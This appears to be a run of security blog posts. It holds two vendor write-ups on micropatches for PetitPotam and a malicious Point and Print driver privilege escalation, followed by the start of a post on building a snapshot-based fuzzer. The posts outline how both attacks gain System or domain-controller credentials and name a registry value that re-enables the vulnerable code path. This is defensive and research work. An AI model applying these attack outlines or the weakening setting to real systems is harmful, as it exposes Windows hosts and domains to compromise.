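    // Impersonate the client of the current RPC call (0 = current client).
    RPC_STATUS Status = RpcImpersonateClient(0);
    if (Status != RPC_S_OK) {
        return Status;
    }

    // Any network access here, e.g. opening a \\server\share path,
    // authenticates as the requester instead of as Local System.
    HANDLE File = CreateFileW(AttackerControlledPath, GENERIC_READ,
                              FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (File != INVALID_HANDLE_VALUE) {
        CloseHandle(File);
    }

    // Drop the impersonation before returning to code that must run as the
    // service identity again.
    RpcRevertToSelf();
    return RPC_S_OK;
}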

The patch contains two patchlets, one starting impersonation by calling RpcImpersonateClient,  and another stopping impersonation by calling RpcRevertToSelf.



MODULE_PATH "..\Affected_Modules\efslsaext.dll_10.0.17763.1075_64bit_WinSrv2019-u202107\efslsaext.dll"
PATCH_ID 663
PATCH_FORMAT_VER 2
VULN_ID 7174
PLATFORM win64

patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x280c
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 0
    PIT rpcrt4!0x53370,efslsaext!0x288c
    ;0x53370 -> RpcImpersonateClient
    ;0x288c -> Error block
    
    code_start        ;Injected at the top of the block containing
                      ;EfsRpcGetLocalFileName, in the EfsRpcOpenFileRaw_Downlevel
                      ;function
        mov rcx, 0        ;Set rcx for RpcImpersonateClient to 0, so it
                          ;impersonates the current client
        call PIT_0x53370  ;Call RpcImpersonateClient
        mov rbx, rax      ;Move the result to rbx, so it can be used for error
                          ;reporting in case of failure
        cmp rax, 0        ;Check if impersonation failed
        jne PIT_0x288c    ;If failed, jump to error block
    code_end
    
patchlet_end

patchlet_start
    PATCHLET_ID 2
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x288c
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 0
    PIT rpcrt4!0x563b0
    ;0x563b0 -> RpcRevertToSelf
    
    code_start  ;Injected at the top of the block right after the
                ;RpcRevertToSelf call, in the EfsRpcOpenFileRaw_Downlevel function
        call PIT_0x563b0    ;Call RpcRevertToSelf to stop impersonating
    code_end
    
patchlet_end

Let's look at the difference between running the PetitPotam tool against a fully updated Windows Server without and with 0patch.


Without 0patch

Let's see which user executes the call to EfsGetLocalFileName:


 

As expected, it's Local System. And the PetitPotam tool, chained with Active Directory Certificate Server produces domain controller's certificate:

 


With 0patch

Let's see which user executes the call to EfsGetLocalFileName this time:

 


Good, it's the Anonymous Logon user, which is useless to the attacker. Consequently, the PetitPotam attack doesn't work anymore:

 


Patch Availability

This micropatch was written for:

 

  1. Windows Server 2019 (updated with July 2021 Updates)
  2. Windows Server 2016 (updated with July 2021 Updates)
  3. Windows Server 2012 R2 (updated with July 2021 Updates)
  4. Windows Server 2008 R2 (updated with January 2020 Updates, no Extended Security Updates) 

 

Our tests indicate that Windows Server 2012 (non R2), Windows Server 2008 (non R2) and Windows Server 2003 are not affected by this issue.

Micropatches for this vulnerability are, as always, automatically downloaded and applied to all affected computers (unless your policy prevents that), and will be free until Microsoft has issued an official fix. If you want to use them, create a free account at 0patch Central, then install and register 0patch Agent from 0patch.com. Everything else will happen automatically. No computer reboots will be needed.

Compatibility note: Some Windows 10 and Server systems exhibit occasional timeouts in the Software Protection Platform Service (sppsvc.exe) when running 0patch Agent. This looks like a bug in the Windows Code Integrity mitigation, which prevents a 0patch component from being injected into the service (which is okay) but sometimes also does a lot of seemingly meaningless processing that causes process startup to time out. As a result, various licensing-related errors can occur. The issue, should it occur, can be resolved by excluding sppsvc.exe from 0patch injection as described in this article.

Update 8/19/2021: Microsoft's August 2021 updates brought a functionally similar fix to our micropatch, but since additional attack vectors were subsequently discovered, we have issued further micropatches that apply on top of the August 2021 Windows executables. In order to use them, you have to have August 2021 Windows Updates applied. In addition, we have found Windows Server 2012 to be affected by these additional vectors and have also covered this Windows version with our new micropatches.


[Update 8/11/2021: added section Microsoft's Patch]

Microsoft's Patch

August 2021 Windows Updates brought Microsoft's official fix for this issue. The associated documentation states: "The EFS API OpenEncryptedFileRaw(A/W), often used in backup software, continues to work in all versions of Windows (local and remote), except when backing up to or from a system running Windows Server 2008 SP2. OpenEncryptedFileRaw will no longer work on Windows Server 2008 SP2. Note: If you are unable to use backup software on Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1 and later, after installing the updates that address this CVE, contact the manufacturer of your backup software for updates and support."

 Let's take a look at this fix.

 


Microsoft's fix is in the same function as our micropatch (EfsRpcOpenFileRaw_Downlevel in efslsaext.dll), but it sabotages the function so that it no longer works at all. We also sometimes sabotage an entire function, if doing so seems likely to affect such a small number of users that the benefits outweigh the risk. In fact, we were initially inclined to do so here too, as we were unable to find any backup product or mechanism that uses this function - but then decided to fix the obvious bug we had noticed instead, and keep the function "alive".

Note that Microsoft's fix also includes a hidden undocumented feature: instead of outright sabotaging OpenEncryptedFileRaw, the fix checks an undocumented registry value AllowOpenRawDL (DWORD) under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS; if this value exists and is equal to 1, OpenEncryptedFileRaw works as before. Therefore, if Microsoft's fix broke your backup, you can disable it using this value, but doing so will make you vulnerable to the PetitPotam attack.

We find Microsoft's fix appropriate and therefore do not plan to port our PetitPotam micropatch to the August 2021 version of efslsaext.dll, unless 0patch users complain that the fix broke their backups. We also invite any Windows users whose backup got broken by the August 2021 Windows Updates to contact us at [email protected].

Update 8/11/2021: Neither Microsoft's August fix nor our micropatch seem to have covered all PetitPotam affected code. Both fixed the anonymous attack vector but we're investigating additional authenticated paths now and looking for the best way to patch that too. 

Update 8/19/2021: Our new micropatches released today address these additional attack vectors.

 

Credits

We'd like to thank topotam for sharing details about this vulnerability, and Will Dormann, Benjamin Delpy and Kevin Beaumont for sharing lots of useful insights and context that helped us understand this vulnerability and create this micropatch to protect users.

Please revisit this blog post for updates or follow 0patch on Twitter.

Free Micropatches for Malicious Printer Driver Issue (CVE-2021-36958)

5 August 2021 at 13:15

by Mitja Kolsek, the 0patch Team

[Update 9/15/2021: September 2021 Windows Updates fixed this vulnerability in effectively the same way our micropatch did. The issue was assigned CVE-2021-36958]

[Update 8/11/2021: August 2021 Windows Updates did not fix this vulnerability. We're therefore porting our micropatch to the August versions of executables.]

 

With the PrintNightmare vulnerability still echoing (and, in our view, still without a complete official fix), another printing-related issue was found by security researcher Benjamin Delpy that allows a local unprivileged user on a Windows machine to execute arbitrary code as System by installing a malicious printer driver.

In essence, the attacker sets up a printer with a modified driver on a machine they control, and then installs this printer using Point and Print on another Windows computer, gaining full control of said computer. While generally considered a local privilege escalation, this issue could also be used in conjunction with some social engineering to get a remote attacker's code executed on user's machine.

The issue is nicely described in this CERT/CC vulnerability note written by Will Dormann. While Windows has required printer driver packages installed via Point and Print to be signed by a trusted source since 2016, Benjamin discovered that additional executable files can be included in such an installation outside the signed package, and these are then automatically loaded (and their code executed) by the Print Spooler service running as System.


How To Fix This?

In contrast to, say, memory corruption bugs or numeric overflows, this is not a trivial issue to fix; adding a signature requirement to queue-specific files would require a lot of code and would be incompatible with the "micro" in micropatching. Disabling the transfer of queue-specific files could do the trick, but might result in confused users when installed printers suddenly behave differently than before, without any notification or warning.

We therefore decided to implement the group policy-based workaround as a micropatch, blocking Point and Print printer driver installation from untrusted servers. This workaround employs two Group Policy settings: "Only use Package Point and Print" requires every printer driver to be in the form of a signed package, while "Package Point and print - Approved servers" limits the set of servers from which printer driver packages are allowed to be installed.

These settings are configurable via registry. Our patch modifies function DoesPolicyAllowPrinterConnectionsToServer in win32spl.dll such that it believes that PackagePointAndPrintOnly and PackagePointAndPrintServerList values exist and are set to 1, which enables both policies and keeps the list of approved servers empty.

Of course, if one has not previously configured Point and Print-related group policy settings, our patch breaks Point and Print driver installation because no servers are approved. On the other hand, on computers which already have these policies enabled, our patch has no effect. The reasoning behind our approach was that many Windows users and admins don't even know they're affected by this issue and just having 0patch installed will automatically resolve this vulnerability for them.
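
For completeness, here is a minimal sketch of enabling the same two policy values programmatically. The value names come from the description above; the registry key path is our assumption (the standard Group Policy location for Point and Print settings), not something taken from win32spl.dll, and approved servers would still need to be configured under the same key:

#include <windows.h>

// Minimal sketch that enables the two Package Point and Print policies the
// micropatch emulates. The key path below is an assumption; verify it against
// your environment before relying on it.
bool EnablePackagePointAndPrintPolicies()
{
    HKEY Key = NULL;
    const wchar_t *Path =
        L"SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PackagePointAndPrint";

    if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, Path, 0, NULL, 0, KEY_SET_VALUE,
                        NULL, &Key, NULL) != ERROR_SUCCESS) {
        return false;
    }

    const DWORD One = 1;
    const bool Success =
        RegSetValueExW(Key, L"PackagePointAndPrintOnly", 0, REG_DWORD,
                       (const BYTE *)&One, sizeof(One)) == ERROR_SUCCESS &&
        RegSetValueExW(Key, L"PackagePointAndPrintServerList", 0, REG_DWORD,
                       (const BYTE *)&One, sizeof(One)) == ERROR_SUCCESS;

    RegCloseKey(Key);
    return Success;
}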

Our micropatch has four tiny patchlets:



MODULE_PATH "..\Affected_Modules\win32spl.dll_10.0.19041.746_32bit_Win10-2004-u202107\win32spl.dll"
PATCH_ID 660
PATCH_FORMAT_VER 2
VULN_ID 7172
PLATFORM win32
patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x4ff70
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0   ; we say that registry key PackagePointAndPrint exists
        add esp, 0Ch ; align stack pointer
    code_end
    
patchlet_end
patchlet_start
    PATCHLET_ID 2
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x4ff8e
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0            ; we say that value PackagePointAndPrintOnly exists
        add esp, 18h          ; align stack pointer
        mov dword[ebp-2Ch], 1 ; value of PackagePointAndPrintOnly is 1
    code_end
    
patchlet_end
patchlet_start
    PATCHLET_ID 3
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x50018
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0   ; we say that registry key PackagePointAndPrint exists
        add esp, 0Ch ; align stack pointer
    code_end
    
patchlet_end
patchlet_start
    PATCHLET_ID 4
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x50039
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 5
    
    code_start
        mov eax, 0            ; we say that value PackagePointAndPrintServerList exists
        add esp, 18h          ; align stack pointer
        mov dword[ebp-2Ch], 1 ; value of PackagePointAndPrintServerList is 1
    code_end
    
patchlet_end

And the video of our patch in action:



This micropatch was written for:

 

  1. Windows Server 2019 (updated with July 2021 Updates)
  2. Windows Server 2016 (updated with July 2021 Updates)
  3. Windows Server 2012 R2 (updated with July 2021 Updates)
  4. Windows Server 2012 (updated with July 2021 Updates)
  5. Windows Server 2008 R2 (updated with January 2020 Updates, no Extended Security Updates) 
  6. Windows Server 2008 R2 (updated with January 2021 Updates, first year of Extended Security Updates only) 
  7. Windows Server 2008 R2 (updated with July 2021 Updates, second year of Extended Security Updates) 
  8. Windows 10 v21H1 (updated with July Updates)
  9. Windows 10 v20H2 (updated with July Updates)
  10. Windows 10 v2004 (updated with July Updates) 
  11. Windows 10 v1909 (updated with July Updates) 
  12. Windows 10 v1903 (updated with December 2020 Updates - latest before end of support)
  13. Windows 10 v1809 (updated with May 2021 Updates - latest before end of support) 
  14. Windows 10 v1803 (updated with May 2021 Updates - latest before end of support)
  15. Windows 10 v1709 (updated with October 2020 Updates - latest before end of support)
  16. Windows 7 (updated with January 2020 Updates, no Extended Security Updates)
  17. Windows 7 (updated with January 2021 Updates, first year of Extended Security Updates only)
  18. Windows 7 (updated with July 2021 Updates, second year of Extended Security Updates)


Micropatches for this vulnerability will be free until Microsoft has issued an official fix. If you want to use them, create a free account at 0patch Central, then install and register 0patch Agent from 0patch.com. Everything else will happen automatically. No computer reboots will be needed.

Compatibility note: Some Windows 10 and Server systems exhibit occasional timeouts in the Software Protection Platform Service (sppsvc.exe) when running 0patch Agent. This looks like a bug in the Windows Code Integrity mitigation, which prevents a 0patch component from being injected into the service (which is okay) but sometimes also does a lot of seemingly meaningless processing that causes process startup to time out. As a result, various licensing-related errors can occur. The issue, should it occur, can be resolved by excluding sppsvc.exe from 0patch injection as described in this article.

 

What to do if the patch breaks printing?

If printing in your network utilizes Point and Print, our patch can cause problems such as users being unable to print to their printers or even seeing them on a network share. If this happens, we recommend adding servers hosting your printers to the approved server list as follows:

  1. Launch mmc.exe as administrator
  2. Select File -> Add/Remove Snap-in
  3. Add "Group Policy Object Editor"
  4. Under Computer Configuration -> Administrative Templates -> Printers, open the "Package Point and print - Approved servers" policy
  5. Enable the policy, click the "Show" button, and add the servers your printers are on to the list

 

Credits

We'd like to thank Benjamin Delpy for sharing details about this vulnerability, and Will Dormann and Kevin Beaumont for sharing lots of useful insights and context that helped us create this micropatch and protect 0patch users.

Please revisit this blog post for updates or follow 0patch on Twitter.

Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is that time of the year when I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It is always an exciting time for me to think and plan for the year ahead; who knows, maybe it'll be the year where I get good at computers, I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like the Windows Hypervisor Platform APIs and the KVM APIs, but also to try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows target: user or kernel, application or service, kernel or driver. He had done some work in this area, so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer, running the target code in some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide the basic features you expect from a modern fuzzer: code coverage, crash detection, a general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and slow to start. The snapshot approach could help fuzz it faster than a traditional approach,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz (wtf), its history, and my overall journey from zero to accomplishing my initial goals. For those who want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel crash dumps, which is essential for wtf. So I wrote kdmp-parser, a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough, because I also needed to dump the CPU state as well as MSRs, etc. Thankfully, yrp604 had already hacked up a Windbg Javascript extension to do the work, so I reused it: bdump.js.

Once I was able to extract the physical memory & the CPU state, I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time, so I started there. bochscpu is basically bochs's CPU available as a Rust library with C bindings (yes, he kindly made bindings because I didn't want to touch any Rust). It is essentially a software CPU that knows how to run Intel 64-bit code and knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs's devices, so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump.
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.
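
To make the page-boundary point concrete, here is a simplified sketch of a physical-memory write (my own illustration, not wtf's actual implementation; I'm assuming bochscpu_mem_phy_translate maps a page-aligned GPA to the host page backing it, which approximates its real signature):

bool PhyWrite(const Gpa_t Gpa, const uint8_t *Buffer, const uint64_t BufferSize) {

  //
  // Copy the buffer page by page; two adjacent GPAs can be backed by
  // completely unrelated host pages, so a single memcpy must never cross a
  // page boundary.
  //

  uint64_t Remaining = BufferSize;
  Gpa_t CurrentGpa = Gpa;
  const uint8_t *CurrentBuffer = Buffer;

  while (Remaining > 0) {
    const uint64_t OffsetInPage = CurrentGpa.U64() & (Page::Size - 1);
    const uint64_t Left = Page::Size - OffsetInPage;
    const uint64_t Size = Remaining < Left ? Remaining : Left;

    //
    // Find the HVA backing this GPA page and write into it.
    //

    uint8_t *Hva =
        (uint8_t *)bochscpu_mem_phy_translate(CurrentGpa.Align().U64());
    if (Hva == nullptr) {
      return false;
    }

    memcpy(Hva + OffsetInPage, CurrentBuffer, Size);

    CurrentGpa = Gpa_t(CurrentGpa.U64() + Size);
    CurrentBuffer += Size;
    Remaining -= Size;
  }

  return true;
}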

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need it to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. As another example, the user might need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy because we receive a notification every time an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

